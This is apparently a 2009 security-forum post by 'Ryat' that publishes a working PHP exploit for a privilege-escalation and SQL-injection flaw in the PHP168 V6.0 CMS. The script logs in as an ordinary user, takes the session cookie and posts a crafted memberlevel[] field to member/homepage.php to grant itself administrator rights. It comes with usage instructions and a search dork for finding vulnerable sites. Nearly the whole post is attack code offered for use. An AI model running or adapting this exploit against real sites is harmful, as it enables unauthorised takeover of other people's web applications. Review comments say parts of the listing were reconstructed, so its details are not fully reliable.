By Ryat
http://www.wolvez.org
2009-07-17
I have been busy at work every day and have not posted on the forum for a long time...
Earlier I published a privilege-escalation vulnerability in PHP168 V2008; the same flaw is present in the corresponding code of PHP168 V6.0.
The exploit is given directly below. Some of the details are interesting; if you are curious, analyze them yourself :)
EXP:
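#!/usr/bin/php
<?php
/**
 * PHP168 V6.0 "update user access" exploit (puret_t / wolvez.org, 2009).
 *
 * Usage: php <script> host path user pass
 *   host  target server (ip/hostname), reached on port 80 (plain HTTP)
 *   path  web path to PHP168, with trailing slash, e.g. /php168/
 *   user  login name of an ordinary (non-admin) account
 *   pass  its password
 *
 * Flow:
 *   1. send() with no cookie set POSTs a normal login to do/login.php.
 *   2. The "passport=<uid>%09<token>" cookie is picked out of the response.
 *   3. send() again, now with the cookie, POSTs the crafted memberlevel[]
 *      form to member/homepage.php; success is detected by the marker
 *      'puret_t' showing up in that reply.
 *
 * NOTE(review): this listing was recovered from a whitespace-mangled paste;
 * quotes, backslashes and CRLF line endings have been restored.
 */
print_r('
+---------------------------------------------------------------------------+
PHP168 V6.0 update user access exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PHP168 V6.0"
+---------------------------------------------------------------------------+
');

/**
 * works regardless of php.ini settings
 */
if ($argc < 5) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php ' . $argv[0] . ' host path user pass
host:  target server (ip/hostname)
path:  path to php168
user:  login username
pass:  login password
Example:
php ' . $argv[0] . ' localhost /php168/ ryat 123456
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);                 // E_ERROR | E_WARNING | E_PARSE
ini_set('max_execution_time', 0);   // two blocking HTTP round-trips may be slow

$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$pass = $argv[4];

// Step 1: plain login. $cookie is still unset, so send() posts do/login.php.
$resp = send();

// Group 1 is the whole passport cookie, group 2 the numeric uid; send()
// reads both from the global $cookie on the second call.
preg_match('/Set-Cookie:\s(passport=([0-9]{1,4})%09[a-zA-Z0-9%]+)/', $resp, $cookie);

if (!$cookie) {
    // Login failed or the response did not carry a passport cookie.
    exit("Exploit Failed!\n");
}

// Step 2: the cookie is set, so send() posts the privilege-escalation form.
// Strict comparison: the original used "!= false", which treats a marker at
// offset 0 (strpos() == 0) as a failure.
if (strpos(send(), 'puret_t') !== false) {
    exit("Exploit Success!\nYou Are Admin Now!\n");
}
exit("Exploit Failed!\n");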
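/**
 * Return a random alphanumeric string of $length characters (default 8).
 *
 * Used by send() to pad the USR cookie field with a throw-away value; it
 * is not a security token and does not need a CSPRNG.
 *
 * The original re-seeded mt_rand() with (double)microtime()*1000000 on
 * every call. That seed has at most ~1e6 distinct values, and PHP >= 4.2
 * seeds the generator itself, so the manual seeding is dropped.
 *
 * @param int $length number of characters; 0 or less yields ''.
 * @return string
 */
function rands($length = 8)
{
    $alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
    $last = strlen($alphabet) - 1;
    $out = '';
    for ($i = 0; $i < $length; $i++) {
        $out .= $alphabet[mt_rand(0, $last)];
    }
    return $out;
}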
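/**
 * Issue one HTTP/1.1 POST to $host:80 and return the raw response
 * (status line, headers and body) as a string; '' if the socket could
 * not be opened.
 *
 * Two modes, selected by the global $cookie (filled in by the caller from
 * the login response):
 *   - $cookie empty: POST username/password/step=2 to do/login.php.
 *   - $cookie set:   POST the crafted memberlevel[] form to
 *                    member/homepage.php?uid=<uid>, sending the passport
 *                    cookie plus a USR field padded with rands().
 *
 * Reads the globals $host, $path, $user, $pass, $cookie. Side effect: in
 * cookie mode $cookie[1] is appended to on every call.
 *
 * Plain HTTP on port 80 only; there is no TLS and no redirect handling.
 */
function send()
{
    global $host, $path, $user, $pass, $cookie;

    if ($cookie) {
        // NOTE(review): recovered from a mangled listing. The USR suffix and
        // the hex literal (0x70757265745f74 == 'puret_t', the marker the
        // caller greps for) were reconstructed; confirm against the original.
        $cookie[1] .= '; USR=' . rands() . '"31';
        $body = 'memberlevel[8]=1&memberlevel[9]=1&memberlevel[3,introduce%3d0x70757265745f74]=-1';
        $target = $path . 'member/homepage.php?uid=' . $cookie[2];
    } else {
        // urlencode() so a name or password containing &, = or % cannot
        // break the form body.
        $body = 'username=' . urlencode($user) . '&password=' . urlencode($pass) . '&step=2';
        $target = $path . 'do/login.php';
    }

    $request  = 'POST ' . $target . " HTTP/1.1\r\n";
    $request .= "Accept: */*\r\n";
    $request .= "Accept-Language: zh-cn\r\n";
    $request .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $request .= 'Host: ' . $host . "\r\n";
    $request .= 'Content-Length: ' . strlen($body) . "\r\n";
    $request .= "Connection: Close\r\n";
    if ($cookie) {
        $request .= 'Cookie: ' . $cookie[1] . "\r\n";
    }
    $request .= "\r\n";           // end of headers
    $request .= $body;

    // The original did not check fsockopen(); a refused connection produced
    // warnings from fputs() and an empty response. Bound the connect with a
    // timeout and return '' explicitly so the caller's checks fail cleanly.
    $fp = @fsockopen($host, 80, $errno, $errstr, 30);
    if (!$fp) {
        return '';
    }
    fputs($fp, $request);

    $resp = '';
    while (!feof($fp)) {
        $resp .= fread($fp, 1024);
    }
    fclose($fp);
    return $resp;
}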
?>